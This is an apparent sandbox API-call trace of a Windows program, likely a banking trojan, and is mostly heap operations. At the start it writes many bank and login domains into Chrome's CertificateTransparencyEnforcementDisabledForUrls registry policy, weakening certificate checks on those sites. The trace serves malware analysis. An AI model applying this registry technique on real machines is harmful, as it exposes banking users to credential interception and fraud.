	[0191.612] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x118bac0 | out: hHeap=0x260000) returned 1
	[0191.612] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x118cdd8 | out: hHeap=0x260000) returned 1
	[0191.612] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x118cdd8
	[0191.612] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x118cdd8 | out: hHeap=0x260000) returned 1
	[0191.612] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x3f8) returned 0x0
	[0191.613] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x400, lpdwDisposition=0x0) returned 0x0
	[0191.613] RegSetValueExA (in: hKey=0x400, lpValueName="100", Reserved=0x0, dwType=0x1, lpData="sellercentral.amazon.com", cbData=0x18 | out: lpData="sellercentral.amazon.com") returned 0x0
	[0191.614] RegCloseKey (hKey=0x400) returned 0x0
	[0191.614] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x35f418
	[0191.614] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x35f418 | out: hHeap=0x260000) returned 1
	[0191.614] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.614] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.614] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.614] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x3fc) returned 0x0
	[0191.614] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x404, lpdwDisposition=0x0) returned 0x0
	[0191.614] RegSetValueExA (in: hKey=0x404, lpValueName="101", Reserved=0x0, dwType=0x1, lpData="www.simplii.com", cbData=0xf | out: lpData="www.simplii.com") returned 0x0
	[0191.615] RegCloseKey (hKey=0x404) returned 0x0
	[0191.615] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x400) returned 0x0
	[0191.615] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x408, lpdwDisposition=0x0) returned 0x0
	[0191.615] RegSetValueExA (in: hKey=0x408, lpValueName="102", Reserved=0x0, dwType=0x1, lpData="simplii.com", cbData=0xb | out: lpData="simplii.com") returned 0x0
	[0191.616] RegCloseKey (hKey=0x408) returned 0x0
	[0191.616] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x35f418
	[0191.616] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x35f418 | out: hHeap=0x260000) returned 1
	[0191.616] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.616] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.616] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.616] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x404) returned 0x0
	[0191.616] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x40c, lpdwDisposition=0x0) returned 0x0
	[0191.616] RegSetValueExA (in: hKey=0x40c, lpValueName="103", Reserved=0x0, dwType=0x1, lpData="online.simplii.com", cbData=0x12 | out: lpData="online.simplii.com") returned 0x0
	[0191.617] RegCloseKey (hKey=0x40c) returned 0x0
	[0191.617] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x35f418
	[0191.617] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x35f418 | out: hHeap=0x260000) returned 1
	[0191.617] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.617] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.617] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.618] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x408) returned 0x0
	[0191.618] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x410, lpdwDisposition=0x0) returned 0x0
	[0191.618] RegSetValueExA (in: hKey=0x410, lpValueName="104", Reserved=0x0, dwType=0x1, lpData="express.53.com", cbData=0xe | out: lpData="express.53.com") returned 0x0
	[0191.618] RegCloseKey (hKey=0x410) returned 0x0
	[0191.619] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x35f418
	[0191.619] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x35f418 | out: hHeap=0x260000) returned 1
	[0191.619] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.619] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.619] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.619] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x40c) returned 0x0
	[0191.619] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x414, lpdwDisposition=0x0) returned 0x0
	[0191.619] RegSetValueExA (in: hKey=0x414, lpValueName="105", Reserved=0x0, dwType=0x1, lpData="www.key.com", cbData=0xb | out: lpData="www.key.com") returned 0x0
	[0191.620] RegCloseKey (hKey=0x414) returned 0x0
	[0191.620] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x410) returned 0x0
	[0191.620] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x418, lpdwDisposition=0x0) returned 0x0
	[0191.620] RegSetValueExA (in: hKey=0x418, lpValueName="106", Reserved=0x0, dwType=0x1, lpData="key.com", cbData=0x7 | out: lpData="key.com") returned 0x0
	[0191.621] RegCloseKey (hKey=0x418) returned 0x0
	[0191.621] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x70) returned 0x11821f8
	[0191.621] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11821f8 | out: hHeap=0x260000) returned 1
	[0191.621] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1182270 | out: hHeap=0x260000) returned 1
	[0191.621] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x70) returned 0x1182270
	[0191.621] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1182270 | out: hHeap=0x260000) returned 1
	[0191.621] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x414) returned 0x0
	[0191.621] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x41c, lpdwDisposition=0x0) returned 0x0
	[0191.621] RegSetValueExA (in: hKey=0x41c, lpValueName="107", Reserved=0x0, dwType=0x1, lpData="ibx.key.com", cbData=0xb | out: lpData="ibx.key.com") returned 0x0
	[0191.622] RegCloseKey (hKey=0x41c) returned 0x0
	[0191.622] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x35f418
	[0191.622] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x35f418 | out: hHeap=0x260000) returned 1
	[0191.622] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.622] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.622] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.622] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x418) returned 0x0
	[0191.622] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x420, lpdwDisposition=0x0) returned 0x0
	[0191.622] RegSetValueExA (in: hKey=0x420, lpValueName="108", Reserved=0x0, dwType=0x1, lpData="keynavigator.key.com", cbData=0x14 | out: lpData="keynavigator.key.com") returned 0x0
	[0191.623] RegCloseKey (hKey=0x420) returned 0x0
	[0191.623] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c4f0
	[0191.623] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c4f0 | out: hHeap=0x260000) returned 1
	[0191.623] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.623] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c340
	[0191.623] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.623] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x41c) returned 0x0
	[0191.623] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x424, lpdwDisposition=0x0) returned 0x0
	[0191.623] RegSetValueExA (in: hKey=0x424, lpValueName="109", Reserved=0x0, dwType=0x1, lpData="securentrycorp.amegybank.com", cbData=0x1c | out: lpData="securentrycorp.amegybank.com") returned 0x0
	[0191.624] RegCloseKey (hKey=0x424) returned 0x0
	[0191.624] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x35f418
	[0191.624] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x35f418 | out: hHeap=0x260000) returned 1
	[0191.624] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.624] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.625] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.625] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x420) returned 0x0
	[0191.625] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x428, lpdwDisposition=0x0) returned 0x0
	[0191.625] RegSetValueExA (in: hKey=0x428, lpValueName="110", Reserved=0x0, dwType=0x1, lpData="mblogin.verizonwireless.com", cbData=0x1b | out: lpData="mblogin.verizonwireless.com") returned 0x0
	[0191.626] RegCloseKey (hKey=0x428) returned 0x0
	[0191.626] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x1178fa0
	[0191.626] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1178fa0 | out: hHeap=0x260000) returned 1
	[0191.626] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1178f48 | out: hHeap=0x260000) returned 1
	[0191.626] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x1178f48
	[0191.626] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1178f48 | out: hHeap=0x260000) returned 1
	[0191.627] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0192.728] lstrcmpA (lpString1="sinj", lpString2="sinj") returned 0
	[0192.728] GetProcessHeap () returned 0x260000
	[0192.728] HeapValidate (hHeap=0x260000, dwFlags=0x0, lpMem=0x0) returned 1
	[0192.728] GetProcessHeap () returned 0x260000
	[0192.728] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x260000) returned 1
	[0192.728] GetProcessHeap () returned 0x260000
	[0192.728] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x14d08) returned 0x2c1500
	[0192.728] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x14d33) returned 0x2d6210
	[0192.729] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x14d33) returned 0x2eaf50
	[0192.730] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xc0) returned 0x32d448
	[0192.730] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xc0) returned 0x32d9c0
	[0192.730] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x32d448 | out: hHeap=0x260000) returned 1
	[0192.730] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xc0) returned 0x32d448
	[0192.730] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0192.730] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191d30
	[0192.730] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0192.730] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0192.730] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191d58
	[0192.730] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0192.730] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0192.731] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x35f418
	[0192.731] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0192.731] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0192.731] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x35f140
	[0192.731] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0192.731] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0192.731] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191d80
	[0192.731] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191da8
	[0192.731] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191d80 | out: hHeap=0x260000) returned 1
	[0192.731] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191d80
	[0192.731] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191dd0
	[0192.731] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191da8 | out: hHeap=0x260000) returned 1
	[0192.731] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c340
	[0192.731] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191da8
	[0192.731] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191dd0 | out: hHeap=0x260000) returned 1
	[0192.731] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191d80 | out: hHeap=0x260000) returned 1
	[0192.731] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0192.731] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x35f3a8
	[0192.731] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x35f568
	[0192.731] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x35f3a8 | out: hHeap=0x260000) returned 1
	[0192.731] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191d80
	[0192.731] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x35f3a8
	[0192.731] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x35f568 | out: hHeap=0x260000) returned 1
	[0192.731] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c4f0
	[0192.731] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x35f568
	[0192.731] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x35f3a8 | out: hHeap=0x260000) returned 1
	[0192.731] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191d80 | out: hHeap=0x260000) returned 1
	[0192.731] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x18) returned 0x27e078
	[0192.731] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x35f3a8
	[0192.731] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27e078 | out: hHeap=0x260000) returned 1
	[0192.731] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191d80
	[0192.731] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x118dba0
	[0192.731] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xc8) returned 0x30b508
	[0192.732] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191dd0
	[0192.732] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c460
	[0192.732] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191df8
	[0192.732] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x118db30
	[0192.732] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c388
	[0192.732] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1185a60
	[0192.732] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191e20
	[0192.732] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1185a98
	[0192.732] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x35f3a8 | out: hHeap=0x260000) returned 1
	[0192.732] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x118dba0 | out: hHeap=0x260000) returned 1
	[0192.732] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191d80 | out: hHeap=0x260000) returned 1
	[0192.732] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x35f568 | out: hHeap=0x260000) returned 1
	[0192.732] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c4f0 | out: hHeap=0x260000) returned 1
	[0192.732] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0192.732] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191da8 | out: hHeap=0x260000) returned 1
	[0192.732] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0192.732] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0192.732] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x35f140 | out: hHeap=0x260000) returned 1
	[0192.732] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x35f418 | out: hHeap=0x260000) returned 1
	[0192.732] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191d58 | out: hHeap=0x260000) returned 1
	[0192.732] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191d30 | out: hHeap=0x260000) returned 1
	[0192.732] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x32d448 | out: hHeap=0x260000) returned 1
	[0192.732] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xb0) returned 0x1186248
	[0192.732] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1186248 | out: hHeap=0x260000) returned 1
	[0192.732] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xb0) returned 0x1186248
	[0192.732] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191d30
	[0192.732] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191d58
	[0192.732] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191d30 | out: hHeap=0x260000) returned 1
	[0192.732] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191d30
	[0192.732] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191da8
	[0192.732] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191d30 | out: hHeap=0x260000) returned 1
	[0192.732] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x35f418
	[0192.732] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x35f140
	[0192.733] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x35f418 | out: hHeap=0x260000) returned 1
	[0192.733] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x35f418
	[0192.733] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x35f568
	[0192.733] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x35f418 | out: hHeap=0x260000) returned 1
	[0192.733] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191d30
	[0192.733] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191d80
	[0192.733] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191e48
	[0192.733] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191d80 | out: hHeap=0x260000) returned 1
	[0192.733] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191d80
	[0192.733] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191e70
	[0192.733] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191e48 | out: hHeap=0x260000) returned 1
	[0192.733] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c340
	[0192.733] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191e48
	[0192.733] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191e70 | out: hHeap=0x260000) returned 1
	[0192.733] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191d80 | out: hHeap=0x260000) returned 1
	[0192.733] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x35f418
	[0192.733] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x35f3a8
	[0192.733] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1185ad0
	[0192.733] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x35f3a8 | out: hHeap=0x260000) returned 1
	[0192.733] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191d80
	[0192.733] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x35f3a8
	[0192.733] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1185ad0 | out: hHeap=0x260000) returned 1
	[0192.733] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c4f0
	[0192.733] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1185ad0
	[0192.733] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x35f3a8 | out: hHeap=0x260000) returned 1
	[0192.733] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191d80 | out: hHeap=0x260000) returned 1
	[0192.733] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x18) returned 0x27e078
	[0192.733] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x35f3a8
	[0192.733] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27e078 | out: hHeap=0x260000) returned 1
	[0192.733] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191d80
	[0192.733] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1185b08
	[0192.733] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x190) returned 0x35fe20
	[0192.733] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191e70
	[0192.734] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c538
